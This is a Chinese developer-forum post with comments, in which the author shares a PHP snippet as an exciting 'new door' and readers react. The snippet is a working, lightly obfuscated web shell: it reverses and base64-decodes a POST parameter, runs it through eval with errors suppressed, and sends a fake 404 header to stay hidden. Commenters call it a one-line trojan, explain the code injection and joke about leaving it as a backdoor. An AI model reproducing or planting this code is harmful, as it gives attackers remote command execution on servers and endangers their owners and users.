"打开一扇新的大门"

代码写这么多年,从来没往这方面想,前段时间一个做安全的同事给发了一段代码,原来 PHP 还能有这种骚操作,真是感觉为我打开了一扇新的大门,而这个函数服务器默认是不会禁用的,放这么一段代码就能玩一些骚操作了 分享一下

<?php
class obj
{
    static public $params=null;
    function __construct($params="error"){
        self::$params=$params;
        @eval(null.self::$params);
    }
}
$params = null.base64_decode(strrev(@$_POST["params"]));
$obj = new obj($params);
header('HTTP/1.1 404 Not Found');
本作品采用《CC 协议》,转载必须注明作者和本文链接
《L05 电商实战》
从零开发一个电商项目,功能包括电商后台、商品 & SKU 管理、购物车、订单管理、支付宝支付、微信支付、订单退款流程、优惠券等
《L04 微信小程序从零到发布》
从小程序个人账户申请开始,带你一步步进行开发一个微信小程序,直到提交微信控制台上线发布。
讨论数量: 11

eval 一般禁用

4年前 评论
vinhson 4年前
guoke0826 (楼主) 4年前
admin0 4年前
guoke0826 (楼主) 4年前

没看明白,拼接 null 是啥意思。

4年前 评论

php 一句话木马,也很骚

4年前 评论

虽然看不懂,感觉像病毒

4年前 评论

@EmptyCup 可能是个人习惯 我直接复制过来的 没什么意思

4年前 评论
wanghan

没看懂

4年前 评论

@wanghan 安全问题,代码注入。主要是 eval 函数,eval 能把字符串当成 php 语句来执行,当前例子,字符串由外界输入控制,所以外界输入什么,内部就会执行什么。

4年前 评论
wanghan 4年前

跑路前给自己留下的通行证🤪

4年前 评论

拔出菜刀,试一试哈,被拦截了...@eval ( 这个特征码太明显

4年前 评论

未填写
文章
1
粉丝
12
喜欢
2
收藏
6
排名:1932
访问:1124
私信
所有博文
社区赞助商